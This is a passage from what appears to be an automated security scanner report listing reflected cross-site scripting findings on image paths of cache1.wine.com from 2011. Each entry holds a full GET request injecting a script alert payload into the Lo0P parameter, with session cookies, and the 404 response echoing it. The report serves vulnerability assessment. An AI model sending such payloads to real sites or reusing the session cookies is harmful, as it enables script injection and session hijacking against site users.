Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 265
Date: Mon, 14 Feb 2011 17:16:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/btnSignUp.gif?Lo0P=c16d4<script>alert(1)</script>6e3a014bc6a was not found on this server.<P>
...[SNIP]...

1.66. http://cache1.wine.com/images/homepage/btnStartShopping.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/btnStartShopping.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 9b8d8<script>alert(1)</script>da719b61f4c was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/btnStartShopping.gif?Lo0P=9b8d8<script>alert(1)</script>da719b61f4c HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 272
Date: Mon, 14 Feb 2011 17:16:31 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/btnStartShopping.gif?Lo0P=9b8d8<script>alert(1)</script>da719b61f4c was not found on this server.<P>
...[SNIP]...

1.67. http://cache1.wine.com/images/homepage/hp_rotating_images/750x200_10shipping.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/hp_rotating_images/750x200_10shipping.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 60e41<script>alert(1)</script>895d278f609 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/hp_rotating_images/750x200_10shipping.jpg?Lo0P=60e41<script>alert(1)</script>895d278f609 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 293
Date: Mon, 14 Feb 2011 17:16:21 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/hp_rotating_images/750x200_10shipping.jpg?Lo0P=60e41<script>alert(1)</script>895d278f609 was not found on this server.<P>
...[SNIP]...

1.68. http://cache1.wine.com/images/homepage/hp_rotating_images/750x200_WS_save70-noshipping.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/hp_rotating_images/750x200_WS_save70-noshipping.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 84199<script>alert(1)</script>5ba932fb349 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/hp_rotating_images/750x200_WS_save70-noshipping.jpg?Lo0P=84199<script>alert(1)</script>5ba932fb349 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 303
Date: Mon, 14 Feb 2011 17:16:34 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/hp_rotating_images/750x200_WS_save70-noshipping.jpg?Lo0P=84199<script>alert(1)</script>5ba932fb349 was not found on this server.<P>
...[SNIP]...

1.69. http://cache1.wine.com/images/homepage/hp_rotating_images/750x200_cali_toprated_2010.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/hp_rotating_images/750x200_cali_toprated_2010.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 142eb<script>alert(1)</script>d58320de07d was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/hp_rotating_images/750x200_cali_toprated_2010.jpg?Lo0P=142eb<script>alert(1)</script>d58320de07d HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 301
Date: Mon, 14 Feb 2011 17:16:05 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/hp_rotating_images/750x200_cali_toprated_2010.jpg?Lo0P=142eb<script>alert(1)</script>d58320de07d was not found on this server.<P>
...[SNIP]...

1.70. http://cache1.wine.com/images/homepage/hp_rotating_images/750x200_silveroaknapa2006.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/hp_rotating_images/750x200_silveroaknapa2006.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 6edfe<script>alert(1)</script>4623ffcea28 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/hp_rotating_images/750x200_silveroaknapa2006.jpg?Lo0P=6edfe<script>alert(1)</script>4623ffcea28 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 300
Date: Mon, 14 Feb 2011 17:16:21 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/hp_rotating_images/750x200_silveroaknapa2006.jpg?Lo0P=6edfe<script>alert(1)</script>4623ffcea28 was not found on this server.<P>
...[SNIP]...

1.71. http://cache1.wine.com/images/icnCloseWindow.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/icnCloseWindow.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 3ba42<script>alert(1)</script>fbdde2091d8 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icnCloseWindow.gif?Lo0P=3ba42<script>alert(1)</script>fbdde2091d8 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 261
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/icnCloseWindow.gif?Lo0P=3ba42<script>alert(1)</script>fbdde2091d8 was not found on this server.<P>
...[SNIP]...

1.72. http://cache1.wine.com/images/icon_email.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/icon_email.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload c7e77<script>alert(1)</script>dca623c0d7 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/icon_email.gif?Lo0P=c7e77<script>alert(1)</script>dca623c0d7 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 256
Date: Mon, 14 Feb 2011 17:16:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/icon_email.gif?Lo0P=c7e77<script>alert(1)</script>dca623c0d7 was not found on this server.<P>
...[SNIP]...

1.73. http://cache1.wine.com/images/imgCart.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/imgCart.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload dd0b1<script>alert(1)</script>9f3ec79514b was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/imgCart.gif?Lo0P=dd0b1<script>alert(1)</script>9f3ec79514b HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 254
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/imgCart.gif?Lo0P=dd0b1<script>alert(1)</script>9f3ec79514b was not found on this server.<P>
...[SNIP]...

1.74. http://cache1.wine.com/images/logos/wineManLine.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/logos/wineManLine.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 997d6<script>alert(1)</script>2dcb5ef0eff was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/logos/wineManLine.gif?Lo0P=997d6<script>alert(1)</script>2dcb5ef0eff HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 264
Date: Mon, 14 Feb 2011 17:16:11 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/logos/wineManLine.gif?Lo0P=997d6<script>alert(1)</script>2dcb5ef0eff was not found on this server.<P>
...[SNIP]...

1.75. http://cache1.wine.com/images/rating96.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/rating96.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload e0e4d<script>alert(1)</script>4028e97db73 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/rating96.gif?Lo0P=e0e4d<script>alert(1)</script>4028e97db73 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/rating96.gif?Lo0P=e0e4d<script>alert(1)</script>4028e97db73 was not found on this server.<P>
...[SNIP]...

1.76. http://cache1.wine.com/images/ratingPR.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/ratingPR.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 9b5ca<script>alert(1)</script>8885bdcc901 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingPR.gif?Lo0P=9b5ca<script>alert(1)</script>8885bdcc901 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 255
Date: Mon, 14 Feb 2011 17:16:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/ratingPR.gif?Lo0P=9b5ca<script>alert(1)</script>8885bdcc901 was not found on this server.<P>
...[SNIP]...

1.77. http://cache1.wine.com/images/ratingST.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/ratingST.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload c2a1f<script>alert(1)</script>8dad4a9f8d2 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/ratingST.gif?Lo0P=c2a1f<script>alert(1)</script>8dad4a9f8d2 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
